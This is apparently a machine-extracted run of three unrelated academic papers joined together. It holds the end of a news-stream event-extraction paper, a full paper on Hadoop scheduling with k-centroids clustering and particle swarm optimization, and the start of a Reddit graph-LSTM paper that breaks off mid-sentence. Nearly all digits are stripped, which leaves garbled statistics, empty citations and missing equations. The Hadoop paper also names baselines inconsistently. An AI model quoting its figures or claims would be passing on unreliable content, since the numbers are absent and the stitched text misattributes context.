e.g. “cutler hits martellus bennett with td in closing seconds.” is not good for the beat(team, team) relation, even though hit is a synonym for beat in general. these two systems show that it is not enough to use an off-the-shelf paraphrasing database for extraction. the ablation test shows the effectiveness of the temporal negation hypothesis: after turning off the relevant features and heuristic labels, the precision drops about percentage points. in addition, the cross-spike factors bring newsspike-re about % more training sentences and also increase the accuracy. we did bootstrap sampling to test the statistical significance of newsspike-re’s improvement in accuracy over each comparison system and abla- tion of newsspike-re. for each system we com- puted the accuracy of samples of labeled outputs. we then ran the paired t-test over the ac- curacy numbers of each other system compared to newsspike-re. for all but w/o cross the improve- ment is strongly significant with p-value less than %. the increase in accuracy compared to w/o cross has borderline significance (p-value . %), but is a clear win with its % increase in training size. . performance of the event extractors most previous relation extraction approaches either require a manually labeled training set, or work only on a pre-defined set of relations that have ground instances from kbs. the closest work to newsspike-re is universal schemas (riedel et al., ), which addresses the limitation of dis- tant supervision that the relations must exist in kbs. their solution is to treat the surface strings, de- pendency paths, and relations from kbs as equal “schemas”, and then to exploit the correlation be- tween the instances and the schemas from a very large unlabeled corpus. in their paper, riedel et al. evaluated only on static relations from freebase and achieve state-of-the-art performance. but universal schemas can be adapted to handle events, by intro- ducing the events as schemas and heuristically find- ing seed instances. we set up a competing system (r ) as follows: ( ) we take the nytimes corpus published between and (sandhaus, ), the dataset used by riedel et al. ( ) containing . million ny times articles; ( ) the instances (i.e. the rows of the matrix) come from the entity pairs from the news ar- ticles; ( ) there are two types of columns: some are the extraction features used by newsspike-re, in- cluding the lexicalized dependency paths described in riedel et al.; others are event relations e = e(t , t ); ( ) for an entity pair (a ,a ), if there is an openie extraction (a ,e,a ) and the entity types of (a ,a ) match (t , t ), we assume the event rela- tion e is observed on that instance. as shown in table , parallel news streams are a promising resource for clustering because of the strong correlation between the instances and the event phrases. we train another version of universal schemas r p on the parallel news streams ns . in particular, entity pairs from different newsspikes are used as different rows in the matrix. we would like to measure the precision and re- call of the extractors. but note that it is impos- sible to fully label all the sentences, so we follow the “pooling” technique described in (riedel et al., ) to create the labeled dataset. for every com- peting system, we sample top outputs for every event relation and add this to the pool. the anno- tators are shown these sentences and asked to judge whether the sentence expresses the event relation or not. after that, the labeled set become “gold” and can be used to measure the precision and pseudo- recall. there are in all , distinct sentences in the pool, since some outputs are produced by mul- tiple systems. among them, , sentences are la- beled as positive. in table , the # columns show the number of true extractions in the pool for every event relation. similar to the diverse condition in table , it is important that the extractor can correctly predict on diverse sentences that are dissimilar to each other. thus we conducted a “diverse pooling”: for each system, we report numbers for the sentences with different dependency paths between the arguments for every discovered event. figure (a) shows the precision pseudo-recall curve for all sentences for the three systems. newsspike-re outperforms the competing sys- tems by a large margin. for example, the area un- der the curve (auc) of newsspike-re for all sen- tences is . while that of r p and r are . and . . this is a % increase over r p and . times the area compared to r . similar increases in auc are observed on diverse sentences. table further lists the breakdown numbers for each event relation, as well as the micro and macro average. although universal schemas had some success for several relations, newsspike-re achieved the best f for out of event relations; best auc for out of . the advantage is even greater in the di- verse condition. it is interesting to see that r p performs much better than r , since the data com- ing from nytimes is much noisier. a closer look shows that universal schemas tends to confuse correlated but different phrases. newsspike-re, however, rarely made these errors because our model can effectively exploit negative evidence to distinguish them. . . comparing to distant supervision although the most event relations in table can- not be handled by the distant supervised approach, it is possible to match buy(org,org) to freebase re- lations with appropriate database operators such as . . . . . . . . . . . . r : uschema on nyt r p: uschema on ns newsspike-re on ns pseudo recall p re c is io n (a) . . . . . . . . . . . . r : uschema on nyt r p: uschema on ns newsspike-re on ns pseudo recall p re c is io n ds on nyt (b) figure : precision pseudo-recall curves for (a) all event relations; (b) buy(org, org), this figure includes the distant supervision algorithm miml learned from matching the freebase relation to the new york times. newsspike-re has auc . , more than doubling r ( . ) and % higher than r p ( . ) for all event relations. join and select (zhang et al., ). to evaluate how distant supervision performs, we introduce the system ds on nyt based on a manual mapping of buy(org,org) to the join relation in freebase. then we match its instances to nytimes articles and fol- low the steps of surdeanu et al. ( ) to train the extractor. the matching to nytimes brings us positive instances having , sentences, but unfortunately the sentence-level accuracy is only % based on examination of random sentences. figure (b) shows the pr curves for all the competing systems. distant supervision predicts the top extractions cor- rectly because the multi-instance technique recog- nizes some common expressions (e.g. buy, acquire), but the precision drops dramatically since most pos- itive expressions are overwhelmed by the noise. conclusions and future work popular distant supervised approaches have limited ability to handle event extraction, since fluent facts are highly time dependent and often do not exist in any kb. this paper presents a novel unsupervised approach for event extraction that exploits parallel news streams. our newsspike-re system auto- matically identifies a set of argument-typed events from a news corpus, and then learns a sentential (micro-reading) extractor for each event. we introduced a novel, temporal negation heuris- tic for parallel news streams that identifies event phrases that are correlated, but are not paraphrases. we encoded this in a probabilistic graphical model /organization/organization/companies_ acquired /business/acquisition/company_acquired to cluster sentences, generating high quality training data to learn a sentential extractor. this provides negative evidence crucial to achieving high preci- sion training data. experiments show the high quality of the gener- ated training sentences and confirm the importance of our negation heuristic. our most important exper- iment shows that we can learn accurate event extrac- tors from this training data. newsspike-re out- performs comparable extractors by a wide margin, more than doubling the area under a precision-recall curve compared to universal schemas. in future work we plan to implement our system as an end-to-end online service. this would allow users to conveniently define events of interest, learn extractors for each event, and return extracted facts from news streams. acknowledgments we thank hal daume iii, xiao ling, luke zettle- moyer and the reviewers. this work was supported by onr grant n - - - , the wrf/cable professorship, a gift from google, and the defense advanced research projects agency (darpa) ma- chine reading program under air force research laboratory (afrl) prime contract no. fa - - c- . any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the view of darpa, afrl, or the us government. references eugene agichtein and luis gravano. . snowball: extracting relations from large plain-text collections. in acm dl, pages – . michele banko, michael j. cafarella, stephen soderland, matthew broadhead, and oren etzioni. . open information extraction from the web. in proceedings of the th international joint conference on artificial intelligence (ijcai- ), pages – . regina barzilay and lillian lee. . learning to paraphrase: an unsupervised approach using multiple- sequence alignment. in proceedings of the con- ference of the north american chapter of the associ- ation for computational linguistics on human lan- guage technology (hlt-naacl), pages – . regina barzilay and kathleen r mckeown. . ex- tracting paraphrases from a parallel corpus. in pro- ceedings of the th annual meeting on association for computational linguistics (acl), pages – . edward benson, aria haghighi, and regina barzilay. . event discovery in social media feeds. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics: human language technologies (hlt-naacl), pages – . sergey brin. . extracting patterns and relations from the world wide web. in the world wide web and databases, pages – . andrew carlson, justin betteridge, bryan kisiel, burr settles, estevam r. hruschka jr., and tom m. mitchell. . toward an architecture for never- ending language learning. in proceedings of the aaai conference on artificial intelligence (aaai- ). michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the acl- conference on empirical methods in natu- ral language processing-volume , pages – . mark craven and johan kumlien. . constructing biological knowledge bases by extracting information from text sources. in proceedings of the seventh inter- national conference on intelligent systems for molec- ular biology (ismb), pages – . bill dolan, chris quirk, and chris brockett. . un- supervised construction of large paraphrase corpora: exploiting massively parallel news sources. in com- putational linguistics, page . anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information extraction. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . jenny rose finkel, trond grenager, and christopher manning. . incorporating non-local informa- tion into information extraction systems by gibbs sam- pling. in proceedings of the rd annual meeting on association for computational linguistics (acl), pages – . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in joint human language technology con- ference/annual meeting of the north american chap- ter of the association for computational linguistics (hlt-naacl ), pages – . takaaki hasegawa, satoshi sekine, and ralph grishman. . discovering relations among named entities from large corpora. in proceedings of the nd annual meeting on association for computational linguistics (acl), page . raphael hoffmann, congle zhang, xiao ling, luke zettlemoyer, and daniel s weld. . knowledge- based weak supervision for information extraction of overlapping relations. in proceedings of the th an- nual meeting of the association for computational linguistics: human language technologies (hlt- acl), pages – . ruihong huang and ellen riloff. . multi-faceted event recognition with bootstrapped dictionaries. in the conference of the north american chapter of the association for computational linguistics: human language technologies (hlt-naacl), pages – . dekang lin and patrick pantel. . discovery of infer- ence rules for question-answering. natural language engineering, ( ): – . xiao ling and daniel s weld. . fine-grained entity recognition. in association for the advancement of artificial intelligence (aaai). david mcclosky, mihai surdeanu, and christopher d manning. . event extraction as dependency pars- ing. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies (hlt-acl), pages – . mike mintz, steven bills, rion snow, and daniel juraf- sky. . distant supervision for relation extrac- tion without labeled data. in proceedings of the th annual meeting of the association for computational linguistics (acl), pages – . ndapandula nakashole, martin theobald, and gerhard weikum. . scalable knowledge harvesting with high precision and high recall. in proceedings of the fourth acm international conference on web search and data mining (wsdm), pages – . george l nemhauser and laurence a wolsey. . in- teger and combinatorial optimization, volume . wi- ley new york. roi reichart and regina barzilay. . multi event ex- traction guided by global constraints. in proceedings of the conference of the north american chap- ter of the association for computational linguistics: human language technologies (hlt-naacl), pages – . kevin reschke, martin jankowiak, mihai surdeanu, christopher d manning, and daniel jurafsky. . event extraction using distant supervision. in lan- guage resources and evaluation conference (lrec). sebastian riedel, limin yao, and andrew mccallum. . modeling relations and their mentions with- out labeled text. in machine learning and knowledge discovery in databases (ecml), pages – . sebastian riedel, david mcclosky, mihai surdeanu, an- drew mccallum, and christopher d manning. . model combination for event extraction in bionlp . in proceedings of the bionlp shared task workshop, pages – . sebastian riedel, limin yao, benjamin m. mar- lin, and andrew mccallum. . relation extraction with matrix factorization and universal schemas. in joint human language technology con- ference/annual meeting of the north american chap- ter of the association for computational linguistics (hlt-naacl). alan ritter, oren etzioni, sam clark, et al. . open domain event extraction from twitter. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining (kdd), pages – . evan sandhaus. . the new york times annotated corpus. linguistic data consortium. yusuke shinyama and satoshi sekine. . preemp- tive information extraction using unrestricted relation discovery. in proceedings of the main conference on human language technology conference of the north american chapter of the association of com- putational linguistics (hlt-naacl), pages – . mihai surdeanu, julie tibshirani, ramesh nallapati, and christopher d manning. . multi-instance multi- label learning for relation extraction. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp), pages – . shingo takamatsu, issei sato, and hiroshi nakagawa. . probabilistic matrix factorization leveraging contexts for unsupervised relation extraction. in ad- vances in knowledge discovery and data mining, pages – . fei wu and daniel s. weld. . autonomously se- mantifying wikipedia. in proceedings of the inter- national conference on information and knowledge management (cikm), pages – . limin yao, aria haghighi, sebastian riedel, and andrew mccallum. . structured relation discovery using generative models. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – . limin yao, sebastian riedel, and andrew mccallum. . unsupervised relation discovery with sense dis- ambiguation. in proceedings of the th annual meet- ing of the association for computational linguistics (acl), pages – . alexander yates and oren etzioni. . unsupervised methods for determining object and relation synonyms on the web. journal of artificial intelligence research, ( ): . congle zhang and daniel s weld. . harvesting par- allel news streams to generate paraphrases of event re- lations. in proceedings of the joint conference on empirical methods in natural language process- ing and computational natural language learning (emnlp), pages – . congle zhang, raphael hoffmann, and daniel s weld. . ontological smoothing for relation extraction with minimal supervision. in association for the ad- vancement of artificial intelligence (aaai). a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster e. laxmi lydia ,dr. m.ben swarup associate professor, department of computer science and engineering, vignan’s institute of information technology, visakhapatnam, andhra pradesh, india. professor, computer science and engineering, vignan’s institute of information technology, visakhapatnam, andhra pradesh, india. email:elaxmi @yahoo.com abstract. big data storage management is one of the most challenging issues for hadoop cluster environments, since large amount of data intensive applications frequently involve a high degree of data access locality. in traditional approaches high-performance computing consists dedicated servers that are used to data storage and data replication. therefore to solve the problems of disparateness among the jobs and resources a “disparateness-aware scheduling algorithm” is proposed in the cluster environment. in this research work we represent k-centroids clustering in big data mechanism for hadoop cluster. this approach is mainly focused on the energy consumption in the hadoop cluster, which helps to increase the system reliability. the hadoop cluster consists of resources which are categorized for minimizing the scheduling delay in the hadoop cluster using the k-centroids clustering algorithm. a novel provisioning mechanism is introduced along with the consideration of load, energy, and network time. by integrating these three parameters, the optimized fitness function is employed for particle swarm optimization (pso) to select the computing node. failure may occur after completion of the successful execution in the network. to improve the fault tolerance service, the migration of the cluster is focused on the particular failure node. this can recomputed the node by pso and the corresponding optimal node is predicted. the experimental results exhibit better scheduling length, scheduling delay, speed up, failure ratio, energy consumption than the existing systems. keywords: k-centroids clustering, big data, hadoop cluster, data access locality, data replication, systemreliability, particle swarm optimization international journal of advanced network monitoring and controls year , no. . introduction in recent years, big data has rapidly developed into a hotspot that attracts great attention from academia, industry, and even governments around the world [ – ]. nature and science have published special issues dedicated to discuss the opportunities and challenges brought by big data [ , ]. mckinsey, the well-known management and consulting firm, alleged that big data has penetrated into every area of today’s industry and business functions and has become an important factor in production [ ]. using and mining big data heralds a new wave of productivity growth and consumer impetus. o’reilly media even asserted that “the future belongs to the companies and people that turn data into products”[ ]. some even say that big data can be regarded the new petroleum that will power the future information economy. in short, the era of big data has already been in the offing. what is big data? so far, there is no universally accepted definition. in wikipedia, big data is defined as “an all-encompassing term for any collection of data sets so large and complex that it becomes difficult to process using traditional data processing applications”[ ]. from a macro perspective, big data can be regarded as a bond that subtly connects and integrates the physical world, the human society, and cyberspace. here the physical world has a reflection in cyberspace, embodied as big data, through internet, the internet of things, and other information technologies, while human society generates its big data- based mapping in cyberspace by means of mechanisms like human–computer interfaces, brain–machine interfaces, and mobile internet [ ]. in this sense, big data can basically be classified into two categories, namely, data from the physical world, which is usually obtained through sensors, scientific experiments and observations (such as biological data, neural data, astronomical data, and remote sensing data), and data from the human society, which is often acquired from such sources or domains as social networks, internet, health, finance, economics, and transportation. apache hadoop is a software framework that supports data-intensive distributed applications under a free license. it has been used by many big technology companies, such as amazon, facebook, yahoo and ibm. hadoop [ ] is best known for mapreduce and its distributed file system (hdfs). mapreduce idea is mentioned in a google paper [ ], to be simply the task of mapreduce is another processing of divide and concur. hadoop [ ] is aimed at problems that require examination of all the available data. for example, text analysis and image processing generally require that every single record be read, and often interpreted in the context of similar records. hadoop uses a technique called mapreduce to carry out this exhaustive analysis quickly. hdfs gives the distributed computing storage provides and support. they are the two main subprojects for hadoop platform. .hadoop set fifo algorithm as its default algorithm. according to our research of algorithm for hadoop, we found that it unable to satisfy the demand of users. we cannot only keep the idea of first come first served. we need to think about the requirement form that has the higher priority, but at the same time we also can keep the fairness to other users. then we announced k-centroids clustering algorithm in big data-hadoop cluster. . hadoop and hdfs overview hadoop distributed file system (hdfs)[ ] is the primary storage system used by hadoop applications. the hadoop distributed file system is designed to handle large files (multi-gb) with sequential read/ write operation. each file is broken into chunks, and stored across multiple data nodes as local os track of overall file directory structure and the placement of chunks. datanode reports all its chunks to the namenode at bootup. each chunk has a version number which will be increased for all update. therefore, the namenode know if any of the chunks of a datanode is stale those stale chunks will be garbage collected at a later time. to read a file, the client api will calculate the chunk index based on the offset of the file pointer and make a request to the namenode. the namenode will reply which datanodes has a a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster international journal of advanced network monitoring and controls year , no. copy of that chunk. from this points, the client contacts the datanode directly without going through the namenode. to write a file, client api will first contact the namenode who will designate one of the replica as the primary (by granting it a lease). the response of the namenode contains who is the primary and who are the secondary replicas. then the client push its changes to all datanodes in any order, but this change is stored in a buffer of each datanode. after changes are buffered at all datanodes, the client send a ― commit‖ request to the primary, which determines an order to update and then push this order to all other secondaries. after all secondaries complete the commit, the primary will response to the client about the success. all changes of chunk distribution and metadata changes will be written to an operation log file at the namenode. this log file maintain an order list of operation which is important for the namenode to recover its view after a crash. the namenode also maintain its persistent state by regularly check- pointing to a file. in case of the namenode crash, a new namenode will take over after restoring the state from the last checkpoint file and replay the operation log. fig. . mapreduce overview the mapreduce frame work [ ] consists of a single master jobtracker and one slave tasktracker per cluster node. the master is responsible for scheduling the jobs’ component tasks in the slaves, monitoring them, and re-executing any failed tasks. the slaves executed the tasks as directed by the master. as mentioned, mapreduce applications are based on a master-slave model [ ]. this part describes the various operations that are performed by a generic application to transform input data into output data according to that model. the user defined map and reduce functions [ ], the map function processes a key/value pairs and return a list of intermediate key/value pairs map(k ,v )—-list(k v ) the reduce function merges all intermediate values having the same intermediate key: reduce (k , list(v ))---list(v ) the jobtracker will first determine the number of splits (each split is configurable, ~ - mb) from the input path, and select some tasktracker based on their network proximity to the data sources, then the job tracker send the task requests to those selected task trackers. each tasktracker will start the map phase processing by extracting the input data from the splits. for each record parsed by the “input format”, it invokes the user provided “map” function, which emits a number of key/value pair in the memory buffer. a periodic wakeup process will sort the memory buffer into different reducer node by invoke the “combine” function. the key/value pairs are sorted into one of the r local files (suppose there are r reducer nodes). when the map task completes (all splits are done), the tasktracker will notify the jobtracker. when all the tasktrackers are done, the jobtracker will notify the selected tasktrackers for the reduce phase. each tasktracker will read the region files remotely. it sorts the key/value pairs and for each key, it invokes the “reduce” function, which collects the key/aggregated value into the output file (one per reducer node). fig. . related work hadoop’s mapreduce operation is initiative requesting from tasktracker to jobtracker .the principle is similar to ordinary, non-preemptive scheduling operating system, which is cannot be interrupt once the task is assigned. as what i have learned about the hadoop algorithms, there are four classic algorithms. . first in first out (fifo): this expression describes the principle of a queue processing technique or servicing conflicting demands by ordering process by first come, first served behavior, what comes in first is handled first, what comes in next waits until the first is finished. this is the default algorithm in hadoop. a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster international journal of advanced network monitoring and controls year , no. . round robin (rr): in computer operation, one method of having different program process take turns using the resources of the computer is to limit each process to a certain short time period, then suspending that process to give another process a turn (or “time-slice”). this is often described as round-robin process scheduling. . height priority first (hpf): the algorithm scheduling process, each will be assigned to handle the highest priority ready process. priority setting for the number of static when it can be dynamic. static priority number is in the process of creation is based on the initial characteristics of the process or user requirements identified in the process cannot be changed during operation. dynamic priority number refers to the process and then create an initial priority to determine when the first number, after running in the process as the process characteristics change. . weighted round robin (wrr): weighted round robin is a scheduling discipline. each packet flow or connection has its own packet queue in a network interface card. it is the simplest approximation of generalized. while gps serves infinitesimal amounts of data from each nonempty queue, wrr serves a number of packets for each nonempty queue. . disparateness aware scheduling approach in hadoop cluster environment this section explains the overall flow description of the proposed disparateness-aware scheduling approach in cluster environment. initially, the disparateness cluster environment is created along with the properties of resource such as resource type, processing speed, and the memory. in order to avoid the scheduling delay, the system needs to form a cluster using the k-centroids clustering. depending up on higher priorities, the node will move to the cluster. furthermore, the cosine similarity is finding out to compute the clusters. after accomplishing the cluster, the fitness function is estimated with the consideration of load, energy, and time for each cluster. thus, the clusters are scheduled and then executed after uploading the load. once any failure occurs during the process, the value must recomputed using pso and predicted another optimal node. figure depicts the overall flow diagram of the proposed methodology. the major components of the proposed system are briefly discussed as follows: table. symbols and its descriptions . k-centroids clustering the well-known clustering problem can be solved by k-means, which is one of the simplest unsupervised learning algorithms. assume the k number of clusters for classifying a given cluster processor in a simple and easy way. k-means clustering does not have a guarantee for optimal solution as the performance is based on an initial centroids. thus, the proposed system uses the partitioning clustering, say, k-centroids clustering as described in the following algorithm. table i shows the notation and its description that employed in the proposed system fig. an overall flow diagram of the proposed k-centroids clustering in hadoop cluster. algorithm : k-centroids clustering input: cluster processors cpn, k value begin: initialize k centroids ck for i = , , …n then // cluster resource property a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster international journal of advanced network monitoring and controls year , no. while (curr_index < k) then ifsim [i] [curr_index] < min then min = sim [i] [curr_index] min_index = curr_index; end if curr_index++; end while setclusterid (min_index); end for i; end begin; the inputs taken for the above k-centroids clustering algorithm are the cluster processors and the k value. at first, the k number of centroids are initialized and the vectors v and v are defined with respect to the retrieving time, cluster processing speed, and size of cluster resource. depending up on the vectors, the cosine similarity is estimated. then, the similarity measures verifies for the minimum value of the current index. if the value is said to be less, then it sets as a minimum value. it checks until the current index is less than the k number of centroids. the minimum index is set as the cluster id. further, the fitness function is estimated until all jobs are scheduled by the consideration of load, energy, and time for each cluster. it is defined as: f(n) = t(i,r) + l(i,r) + e(i,r) ( ) . . time computation the time computation for ith cluster completion in rth cluster resource is described as: t(i,r) = itr + et(i,r) + rt(i,r) ( ) where, the executing time of ith cluster in rth cluster resource and retrieving time of ith cluster in rth cluster resource are given respectively as in equation ( ) and equation ( ). ( ) ( ) herein, bwsr is the bandwidth for the scheduler to the receiver and δsr mentions the delay that occurs between the scheduler and the receiver for network communication. . . load computation the load computation of rthcluster resource at ithcluster submission is as follows: ( ) . . energy computation an energy required for ith cluster in rth cluster resource is defined as: e(i,r)=ier + ee(i,r) ( ) where, the execution energy of ith cluster in rth cluster resource is given as: efir = cs * cper ( ) based on the consideration of time, load, and energy, the proposed estimation of fitness function has the following advantages:  the scheduling delay can be avoided in the initial stage.  minimize the computation cost  decrease the execution time . pso based disparateness-aware scheduling model the heuristic optimization algorithms are widely used for solving a wide variety of np-complete problems. pso is considered as the latest evolutionary optimization techniques, which has fewer algorithm parameters than the other approaches. algorithm : disparateness-aware scheduling using pso input : cluster list jn , cluster resource crm output : allocated cluster list aln begin for x = , , … n then tgr = ; // temporary cluster resource list for y= , , … m then if (jx . rtype(). equals( cry . rtype() ) then tcr.add (cry) end if; end fory; scr = pso (tcr, jx ) // selected cluster resource jx . setclusterresource scr alx ← sgr end for x; end begin; the inputs taken for this model are cluster list and the cluster resource. initially, the temporary cluster resource list is empty and the similarity should be further verified. it checks whether the resource type of cluster list is similar to the resource type of cluster resource. if the verification is similar, then the cluster resources are added to the temporary cluster resource list. the technique of pso is applied for the temporary cluster resource list and the cluster list to accomplish the selected cluster resource. the final output obtained in this scheduling model is the allocated cluster resource along with the selected cluster resource. when a failure occurs during this process, it can be recomputed by pso and the other optimal node will be predicted. the advantages over the heterogeneous-aware scheduling model are: a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster international journal of advanced network monitoring and controls year , no.  minimize the number of failures  increases the resource utilization . performance analysis this section compares the performance of the proposed disparateness-aware scheduling (das) algorithm with two existing scheduling algorithms: height priority first (hpf)[ ] and weighted round robin (wrr)[ ].the performance metrics used for the analysis are: system reliability, scheduling delay, scheduling length, speed up, energy consumption, and failure ratio with respect to the number of clusters. due to the dynamic resource availability, the behavior of scheduling algorithms on real cluster platforms is not practical. the simulation is the optimum choice for testing and comparing the scheduling algorithms, where the experiments on real platforms are often non-reproducible. thus, an extensive simulation environment of cluster system is built as in table . table. simulation parameters . system reliability vs. number of clusters the reliability of the system can be calculated by the average reliability of all clusters and is mathematically defined as follows: ( ) here, r[eak] is the distribution of the reliability probability of clusters ak , and n is the number of clusters. fig. describes the system reliability in terms of the number of clusters for the existing hpf and wrr and the proposed das model. the system reliability of das model is greater than the other two existing approaches, where its value is gradually decreased with respect to the number of clusters. fig. the result of system reliability with respect to the number of clusters . scheduling length vs. number of clusters schedule length is measured as: sl=max{sl(a ), sl(a ),…, sl(an) ( ) fig. the result of schedule length with respect to the number of clusters. fig. depicts the result of the schedule length in terms of number of clusters for the existing hpf and wrr and the proposed das model. the schedule length is lower than the other two existing systems. . speed up vs. number of clusters the speed up is the ratio of the sequential execution time to the schedule length of the output schedule. it is computed as follows: ( ) a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster international journal of advanced network monitoring and controls year , no. fig. shows the result of speed up with respect to the number of clusters for the existing hpf and wrr and the proposed das model. the speed up of has model is higher than the other two existing approaches, where its value is gradually increasing with regard to the number of clusters. fig. the result of speed up with respect to the number of clusters. . scheduling delay vs. number of cluster resource fig. the result of scheduling delay with respect to the number of cluster resources. fig. shows the result of scheduling delay with respect to the number cluster resource for the existing hrds and mcms and the proposed has model. the proposed system has a lower scheduling delay than the other two scheduling algorithms. . energy consumption vs. number of cluster resource fig. shows the result of energy consumption with respect to the number cluster resource for the existing hpf and wrr and the proposed das model. the proposed system consumes less energy than the other two scheduling algorithms. its value gradually increases in regards to the number of cluster resource. fig. the result of energy consumption with respect to the number of cluster resource. . failure ratio vs. number of cluster resource the result of the scheduling delay with respect to the number cluster resource for the existing hpf and wrr and the proposed das model is shown in fig. . the proposed system has a lower failure ratio than the other two existing scheduling algorithms. fig. the result of failure ratio with respect to the number of cluster resource. . conclusion and future work this paper proposes a ―disparateness-aware scheduling algorithm in the cluster environment. in this research work we represent k-centroids clustering in big data mechanism for hadoop cluster. this approach is mainly focused on the energy consumption in the hadoop cluster, which helps to increase the system reliability. the hadoop cluster consists of resources which are categorized for minimizing the scheduling delay in the hadoop cluster using the k-centroids clustering algorithm. a novel provisioning mechanism is introduced along with the consideration of load, energy, and network time. by integrating these three parameters, the optimized fitness function is employed for particle swarm optimization (pso) to select the computing node. failure may a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster occur after completion of the successful execution in the network. to improve the fault tolerance service, the migration of the cluster is focused on the particular failure node. this can recomputed the node by pso and the corresponding optimal node is predicted. the experimental results exhibit better scheduling length, scheduling delay, speed up, failure ratio, energy consumption than the existing systems. references [ ]v. mayer-schonberger, k. cukier, big data: a revolution that will transform how we live, work, and think, houghton mifflin harcourt, . [ ]a. cuzzocrea, privacy and security of big data: current challenges and future research perspectives, in: proceedings of the first international workshop on privacy and securityof big data, psbd ’ , . [ ]big data, nature ( ) ( ) – . [ ]dealing with data, science ( ) ( ) – . [ ]c. o’neil, r. schutt, doing data science: straight talk from the frontline, o’reilly media, inc., . [ ]big data, http://en.wikipedia.org/wiki/big_data, . [ ]g. li, x. cheng, research status and scientific thinking of big data, bull. chin. acad. sci. ( ) ( ) – . [ ]y. wang, x. jin xueqi, network big data: present and future, chinese j. comput. ( ) ( ) – . [ ]x.-q. cheng, x. jin, y. wang, j. guo, t. zhang, g. li, survey on big data system and analytic technology, j. softw. ( ) ( ) – . [ ] j.dean,s.ghemawa.mapreduce:simplified data processing on large cluster.osdi’ ,sixth symposium on operating system design and implementation, sanfrancisco , ca ,december, [ ]http://www.vmware.com/appliances/directory/up loaded_files/what% is% hadoop.pdf. [ ] haiyang li ―pwbrr algorithm of hadoop platform. international journal of advanced network monitoring and controls year , no. conversation modeling on reddit using a graph-structured lstm victoria zayats electrical engineering department university of washington vzayats@uw.edu mari ostendorf electrical engineering department university of washington ostendor@uw.edu abstract this paper presents a novel approach for mod- eling threaded discussions on social media using a graph-structured bidirectional lstm (long-short term memory) which represents both hierarchical and temporal conversation structure. in experiments with a task of predicting popularity of comments in reddit discussions, the proposed model outperforms a node-independent architecture for different sets of input features. analyses show a bene- fit to the model over the full course of the dis- cussion, improving detection in both early and late stages. further, the use of language cues with the bidirectional tree state updates helps with identifying controversial comments. introduction social media provides a convenient and widely used platform for discussions among users. when the comment-response links are preserved, those con- versations can be represented in a tree structure where comments represent nodes, the root is the original post, and each new reply to a previous com- ment is added as a child of that comment. some examples of popular services with tree-like struc- tures include facebook, reddit, quora, and stack- exchange. figure shows an example conversa- tion on reddit, where bigger nodes indicate higher upvoting of a comment. in services like twitter, the tool https://whichlight.github.io/ reddit-network-vis was used to obtain this visualiza- tion. figure : visualization of a sample thread on reddit. tweets and their retweets can also be viewed as form- ing a tree structure. when time stamps are avail- able with a contribution, the nodes of the tree can be ordered and annotated with that information. the tree structure is useful for seeing how a discussion unfolds into different subtopics and showing differ- ences in the level of activity in different branches of the discussion. predicting popularity of comments in social me- dia is a task of growing interest. popularity has been defined in terms of the volume of the re- sponse, but when the social media platform has a mechanism for readers to like or dislike com- ments (or, upvote/downvote), then the difference in positive/negative votes provides a more informative score for popularity prediction. this definition of transactions of the association for computational linguistics, vol. , pp. – , . action editor: ani nenkova. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. (a) forward hierarchical and timing structure (b) backward hierarchical and timing structure figure : an example of model propagation in a graph-structured lstm. here, the node name are shown in a chrono- logical order, e.g. comment t was made earlier than t . (a) propagation of graph-structured lstm in the forward direction. blue arrows represent hierarchical propagation, green arrows represent timing propagation. (b) backward hierarchical (blue) and timing (green) propagation of graph-lstm. popularity, which has also been called community endorsement (fang et al., ), is the task of inter- est in our work on tree-structured modeling of dis- cussions. previous studies found that the time when the comment/post was published has a big impact on its popularity (lakkaraju et al., ). in addition, the number of immediate responses can be predic- tive of the popularity, but some comments with a high number of replies can be either controversial or have a highly negative score. language should be extremely important for distinguishing these cases. indeed, community style matching is shown to be correlated to comment popularity in reddit (tran and ostendorf, ). however, learning useful lan- guage cues can be difficult due to the low frequency of these events and the dominance of time, topic and other factors. thus, in several prior studies, au- thors constrained the problem to reduce the effect of those factors (lakkaraju et al., ; tan et al., ; jaech et al., ). in this study, we have no such constraints, but attempt to use the tree structure to capture the flow of information in order to better model the context in which a comment is submitted, including both the history it responds to as well as the subsequent response to that comment. to capture discussion dynamics, we introduce a novel approach to modeling the discussion using a bidirectional graph-structured lstm, where each comment in the tree corresponds to a single lstm unit. in one direction, we capture the prior his- tory of contributions leading up to a node, and in the other, we characterize the response to that com- ment. motivated by prior findings that both response structure and timing are important in predicting pop- ularity (fang et al., ), the lstm units include both hierachical and temporal components to the up- date, which distinguishes this work from prior tree- structured lstm models. we assess the utility of the model in experiments on popularity prediction with reddit discussions, comparing to a neural net- work baseline that treats comments independently but leverages information about the graph context and timing of the comment. we analyze the results to show that the graph lstm provides a useful sum- mary representation of the language context of the comment. as in fang et al. ( ), but unlike other work (he et al., ), our model makes use of the full discus- sion thread in predicting popularity. while knowl- edge of the full discussion is only useful for post- hoc analysis of past discussions, it is reasonable to consider initial responses to a comment, particularly given that many responses occur within minutes of someone posting a comment. comments are often popular because of witty analogies made, which re- quires knowledge of the world beyond what is cap- tured in current models. responses to these com- ments, as well as to controversial comments, can improve popularity prediction. responses of others clearly influence the likelihood of someone to like or dislike a comment, but also whether they even read a comment. by introducing a forward-backward tree- structured model, we provide a mechanism for lever- aging early responses in predicting popularity, as well as a framework for better understanding the rel- ative importance of these responses. the main contributions of this paper include: a novel approach for representing tree-structured lan- guage processes (e.g., social media discussions) with lstms; evaluation of the 